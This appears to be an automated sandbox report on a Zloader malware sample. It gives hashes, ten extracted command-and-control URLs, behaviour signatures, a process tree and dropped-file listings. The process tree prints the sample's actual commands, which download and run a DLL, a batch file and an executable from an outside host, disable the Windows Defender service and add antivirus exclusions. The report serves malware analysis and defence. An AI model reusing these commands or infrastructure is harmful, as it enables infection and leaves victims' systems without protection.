Analysis

  • max time kernel
    64s
  • max time network
    184s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    12-08-2021 15:51

General

  • Target

    42a3e6ae86fe540cfc106f4edc55eccc.exe

  • Size

    165KB

  • MD5

    42a3e6ae86fe540cfc106f4edc55eccc

  • SHA1

    5a43baf8b4e0150ad0228a13da2000311f36f823

  • SHA256

    7ba99f8f77a2e660f1837cad9d169ccf892154da5b2651e4e6e66efddd61944c

  • SHA512

    25d05657f8f927c438ff5240f9f29e8c695e13e8664e822f729c01055026b2ef66ccbebadc0931d5ba488ff369c6dbd1c09055b99ea0f374a37ff6c3bca665c4

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe
    "C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\system32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://pornotublovers.com/JavaE.dll -OutFile JavaE.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1776
      • C:\Windows\system32\regsvr32.exe
        regsvr32 JavaE.dll
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:1384
        • C:\Windows\SysWOW64\regsvr32.exe
          JavaE.dll
          4⤵
          • Loads dropped DLL
          PID:1724
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:292
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
          3⤵
            PID:768
          • C:\Windows\system32\cmd.exe
            cmd /c nsudo.bat
            3⤵
              PID:1732
              • C:\Windows\system32\cacls.exe
                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                4⤵
                  PID:1552
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
                  4⤵
                    PID:1768
                  • C:\Users\Admin\AppData\Roaming\javase.exe
                    javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1604
                    • C:\Users\Admin\AppData\Roaming\javase.exe
                      javase -U:T sc config WinDefend start= disabled
                      4⤵
                        PID:1784
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
                        4⤵
                          PID:1296
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
                          4⤵
                            PID:1600
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
                            4⤵
                              PID:1132
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
                              4⤵
                                PID:1604

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Persistence

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Defense Evasion

                        Modify Registry

                        1
                        T1112

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0becef2b-fe00-48af-8d27-26a1187dd5db
                          MD5

                          6f0d509e28be1af95ba237d4f43adab4

                          SHA1

                          c665febe79e435843553bee86a6cea731ce6c5e4

                          SHA256

                          f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                          SHA512

                          8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0f8c3909-b75e-4a69-ab43-89b8551a4854
                          MD5

                          2d5cd190b5db0620cd62e3cd6ba1dcd3

                          SHA1

                          ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                          SHA256

                          ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                          SHA512

                          edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_260378f9-3558-4d09-b1a5-49a1e89a16e7
                          MD5

                          e5b3ba61c3cf07deda462c9b27eb4166

                          SHA1

                          b324dad73048be6e27467315f82b7a5c1438a1f9

                          SHA256

                          b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                          SHA512

                          a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_612c43d2-6b76-45c2-84d5-9f1487245b61
                          MD5

                          faa37917b36371249ac9fcf93317bf97

                          SHA1

                          a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                          SHA256

                          b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                          SHA512

                          614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_62425d15-bd39-456c-9521-9332d3b10a4f
                          MD5

                          a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                          SHA1

                          81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                          SHA256

                          dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                          SHA512

                          8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d10ab080-a709-428a-91a8-24df1355c50a
                          MD5

                          d89968acfbd0cd60b51df04860d99896

                          SHA1

                          b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                          SHA256

                          1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                          SHA512

                          b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e742efff-8f4a-4bdf-89ed-a57f01007a4c
                          MD5

                          7f79b990cb5ed648f9e583fe35527aa7

                          SHA1

                          71b177b48c8bd745ef02c2affad79ca222da7c33

                          SHA256

                          080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                          SHA512

                          20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          MD5

                          483cb1a5928eef8855c4b9bb0cfdafd5

                          SHA1

                          4b4d0c55a08822d8c1259969048d2378310e3a9f

                          SHA256

                          3f05520534114e911d1ecbb7163734a66859112dddc027e59ad005889df25d6c

                          SHA512

                          3bf2eb371f8c9fe6dfe517592eae1060c9aff106360a3309ae375b08d2319ab76a37fe83d3b59442885979ea63b9d594f7bf6864a5bbaa62dcf722be6113b525

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                          MD5

                          0aa37543d8a186623b0fd09ed6d5bb37

                          SHA1

                          accd8c50b92882ca7c98885f38e269d0ebd2b5ae

                          SHA256

                          0ec620f3e7025864a6af22a924ea135e1ec27ea8b6641e92eb595ccb005fa315

                          SHA512

                          1fb5cb617ce657da240862b8947708f5d9e1b010a20d83a57212c2bdcd759f8b6c1770b293cc3ed9c5c6ee9938e33c83c5cb21b17665b0a1634c67e4686d6a42

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
                          MD5

                          01d416e7915dfd9a2ca0301a02953a3b

                          SHA1

                          b53467be2ca6f37a1b871f9e8f1b1e60af24d72d

                          SHA256

                          1f2c81f0733961b7d585e68d31152ee2c32bbbadb081168ef6ecbb02b28bf061

                          SHA512

                          4f939988b52f4f2c4c2d9f55d2e3aa3cdf3e024fd2d97048982f0db4918f4198d1192f964a3000c063ceaa31b6fa85c72c150108ca63b66f6b29d046127428c6

                        • C:\Users\Admin\AppData\Roaming\JavaE.dll
                          MD5

                          a9dd9b9eff47af724436e2abdcd5ce6c

                          SHA1

                          1a9c9258f0345f5edddd933a7bd15ec42be51f8e

                          SHA256

                          cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

                          SHA512

                          28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                          MD5

                          9f4f14d1b65afd09297b192391f52f38

                          SHA1

                          03bf7e0164afb71e491eaba91193f6d7b9216c3f

                          SHA256

                          4a0de6ebcf1679d64d3169bb1467f17c8ed8599964767055534c9095e7d613df

                          SHA512

                          7f5fa22ee945fdef0bd30e494c409a227726d1260421c86591fac390ec54d20423a15d2d7b367432238b322c19d2bcfb7b483e96f59a3b6b76c0789b4bd57ab0

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                          MD5

                          9f4f14d1b65afd09297b192391f52f38

                          SHA1

                          03bf7e0164afb71e491eaba91193f6d7b9216c3f

                          SHA256

                          4a0de6ebcf1679d64d3169bb1467f17c8ed8599964767055534c9095e7d613df

                          SHA512

                          7f5fa22ee945fdef0bd30e494c409a227726d1260421c86591fac390ec54d20423a15d2d7b367432238b322c19d2bcfb7b483e96f59a3b6b76c0789b4bd57ab0

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                          MD5

                          ef317cf51093655c7fc5896b03ede247

                          SHA1

                          4acb65740fb4fab511686616a89a1fc88f2318da

                          SHA256

                          ea71af69f3205693cbd285b9885f0741c9db1b49a242c7b0bfb9bc2e57ffeac3

                          SHA512

                          bb890ca44a78aef9d29cf342c9cfdeeb8ac7875131f8501d4971ed38f38c9ba75128b63c7cfde00973b6a2a938df852ce6bb65afb66defe1c76d85d7acbfac64

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                          MD5

                          9f4f14d1b65afd09297b192391f52f38

                          SHA1

                          03bf7e0164afb71e491eaba91193f6d7b9216c3f

                          SHA256

                          4a0de6ebcf1679d64d3169bb1467f17c8ed8599964767055534c9095e7d613df

                          SHA512

                          7f5fa22ee945fdef0bd30e494c409a227726d1260421c86591fac390ec54d20423a15d2d7b367432238b322c19d2bcfb7b483e96f59a3b6b76c0789b4bd57ab0

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                          MD5

                          ef317cf51093655c7fc5896b03ede247

                          SHA1

                          4acb65740fb4fab511686616a89a1fc88f2318da

                          SHA256

                          ea71af69f3205693cbd285b9885f0741c9db1b49a242c7b0bfb9bc2e57ffeac3

                          SHA512

                          bb890ca44a78aef9d29cf342c9cfdeeb8ac7875131f8501d4971ed38f38c9ba75128b63c7cfde00973b6a2a938df852ce6bb65afb66defe1c76d85d7acbfac64

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                          MD5

                          ef317cf51093655c7fc5896b03ede247

                          SHA1

                          4acb65740fb4fab511686616a89a1fc88f2318da

                          SHA256

                          ea71af69f3205693cbd285b9885f0741c9db1b49a242c7b0bfb9bc2e57ffeac3

                          SHA512

                          bb890ca44a78aef9d29cf342c9cfdeeb8ac7875131f8501d4971ed38f38c9ba75128b63c7cfde00973b6a2a938df852ce6bb65afb66defe1c76d85d7acbfac64

                        • C:\Users\Admin\AppData\Roaming\javase.exe
                          MD5

                          5cae01aea8ed390ce9bec17b6c1237e4

                          SHA1

                          3a80a49efaac5d839400e4fb8f803243fb39a513

                          SHA256

                          19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                          SHA512

                          c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                        • C:\Users\Admin\AppData\Roaming\javase.exe
                          MD5

                          5cae01aea8ed390ce9bec17b6c1237e4

                          SHA1

                          3a80a49efaac5d839400e4fb8f803243fb39a513

                          SHA256

                          19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                          SHA512

                          c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                        • C:\Users\Admin\AppData\Roaming\nsudo.bat
                          MD5

                          995c3f852ca1e81fc395a5c46b06cb9e

                          SHA1

                          0bc6bc2e425eef07669fa877573b9ba5513ae833

                          SHA256

                          81c64df94f955a49ea7b12ed58098b3dd43c02a28c2f3484c9d4aec0929ddfeb

                          SHA512

                          62dd4f3051917942ee5cae765f4fa0f4da96c49eafd4f00a978f84ddf139488e78a896ff3bdd307dc7d0bfe1902525aa446d7878f016c5ce895bdaee524eebaf

                        • \??\PIPE\srvsvc
                          MD5

                          d41d8cd98f00b204e9800998ecf8427e

                          SHA1

                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                          SHA256

                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                          SHA512

                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                        • \Users\Admin\AppData\Roaming\JavaE.dll
                          MD5

                          a9dd9b9eff47af724436e2abdcd5ce6c

                          SHA1

                          1a9c9258f0345f5edddd933a7bd15ec42be51f8e

                          SHA256

                          cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

                          SHA512

                          28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

                        • \Users\Admin\AppData\Roaming\javase.exe
                          MD5

                          5cae01aea8ed390ce9bec17b6c1237e4

                          SHA1

                          3a80a49efaac5d839400e4fb8f803243fb39a513

                          SHA256

                          19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                          SHA512

                          c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                        • \Users\Admin\AppData\Roaming\javase.exe
                          MD5

                          5cae01aea8ed390ce9bec17b6c1237e4

                          SHA1

                          3a80a49efaac5d839400e4fb8f803243fb39a513

                          SHA256

                          19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                          SHA512

                          c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                        • memory/292-80-0x0000000000000000-mapping.dmp
                        • memory/292-90-0x0000000000090000-0x00000000000B6000-memory.dmp
                          Filesize

                          152KB

                        • memory/540-61-0x0000000000000000-mapping.dmp
                        • memory/768-86-0x000000001AC50000-0x000000001AC51000-memory.dmp
                          Filesize

                          4KB

                        • memory/768-88-0x000000001ABD0000-0x000000001ABD2000-memory.dmp
                          Filesize

                          8KB

                        • memory/768-93-0x000000001B7B0000-0x000000001B7B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/768-87-0x0000000002460000-0x0000000002461000-memory.dmp
                          Filesize

                          4KB

                        • memory/768-89-0x000000001ABD4000-0x000000001ABD6000-memory.dmp
                          Filesize

                          8KB

                        • memory/768-85-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
                          Filesize

                          4KB

                        • memory/768-81-0x0000000000000000-mapping.dmp
                        • memory/768-91-0x00000000023C0000-0x00000000023C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1132-159-0x0000000000000000-mapping.dmp
                        • memory/1132-166-0x000000001ABC4000-0x000000001ABC6000-memory.dmp
                          Filesize

                          8KB

                        • memory/1132-165-0x000000001ABC0000-0x000000001ABC2000-memory.dmp
                          Filesize

                          8KB

                        • memory/1296-141-0x000000001AAD0000-0x000000001AAD1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-119-0x0000000001F20000-0x0000000001F21000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-140-0x00000000026C0000-0x00000000026C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-128-0x0000000002780000-0x0000000002781000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-125-0x0000000002750000-0x0000000002751000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-124-0x0000000002340000-0x0000000002341000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-123-0x00000000025E0000-0x00000000025E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-122-0x000000001ACB4000-0x000000001ACB6000-memory.dmp
                          Filesize

                          8KB

                        • memory/1296-121-0x000000001ACB0000-0x000000001ACB2000-memory.dmp
                          Filesize

                          8KB

                        • memory/1296-120-0x000000001AD30000-0x000000001AD31000-memory.dmp
                          Filesize

                          4KB

                        • memory/1296-115-0x0000000000000000-mapping.dmp
                        • memory/1384-72-0x0000000000000000-mapping.dmp
                        • memory/1552-96-0x0000000000000000-mapping.dmp
                        • memory/1600-149-0x000000001A9D4000-0x000000001A9D6000-memory.dmp
                          Filesize

                          8KB

                        • memory/1600-148-0x000000001A9D0000-0x000000001A9D2000-memory.dmp
                          Filesize

                          8KB

                        • memory/1600-142-0x0000000000000000-mapping.dmp
                        • memory/1604-108-0x0000000000000000-mapping.dmp
                        • memory/1604-168-0x0000000000000000-mapping.dmp
                        • memory/1604-173-0x000000001ABC0000-0x000000001ABC2000-memory.dmp
                          Filesize

                          8KB

                        • memory/1604-174-0x000000001ABC4000-0x000000001ABC6000-memory.dmp
                          Filesize

                          8KB

                        • memory/1660-60-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp
                          Filesize

                          8KB

                        • memory/1724-76-0x00000000762C1000-0x00000000762C3000-memory.dmp
                          Filesize

                          8KB

                        • memory/1724-75-0x0000000000000000-mapping.dmp
                        • memory/1724-78-0x0000000000170000-0x0000000000171000-memory.dmp
                          Filesize

                          4KB

                        • memory/1724-79-0x0000000010000000-0x0000000010129000-memory.dmp
                          Filesize

                          1.2MB

                        • memory/1732-94-0x0000000000000000-mapping.dmp
                        • memory/1768-103-0x000000001A9A0000-0x000000001A9A2000-memory.dmp
                          Filesize

                          8KB

                        • memory/1768-105-0x000000001A970000-0x000000001A971000-memory.dmp
                          Filesize

                          4KB

                        • memory/1768-106-0x000000001C050000-0x000000001C051000-memory.dmp
                          Filesize

                          4KB

                        • memory/1768-102-0x00000000024F0000-0x00000000024F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1768-101-0x000000001AA20000-0x000000001AA21000-memory.dmp
                          Filesize

                          4KB

                        • memory/1768-104-0x000000001A9A4000-0x000000001A9A6000-memory.dmp
                          Filesize

                          8KB

                        • memory/1768-97-0x0000000000000000-mapping.dmp
                        • memory/1768-100-0x00000000025A0000-0x00000000025A1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1776-68-0x000000001A9E0000-0x000000001A9E2000-memory.dmp
                          Filesize

                          8KB

                        • memory/1776-69-0x000000001A9E4000-0x000000001A9E6000-memory.dmp
                          Filesize

                          8KB

                        • memory/1776-67-0x000000001A970000-0x000000001A971000-memory.dmp
                          Filesize

                          4KB

                        • memory/1776-66-0x000000001AA60000-0x000000001AA61000-memory.dmp
                          Filesize

                          4KB

                        • memory/1776-65-0x0000000002450000-0x0000000002451000-memory.dmp
                          Filesize

                          4KB

                        • memory/1776-63-0x0000000000000000-mapping.dmp
                        • memory/1776-70-0x0000000002520000-0x0000000002521000-memory.dmp
                          Filesize

                          4KB

                        • memory/1776-71-0x000000001C370000-0x000000001C371000-memory.dmp
                          Filesize

                          4KB

                        • memory/1784-112-0x0000000000000000-mapping.dmp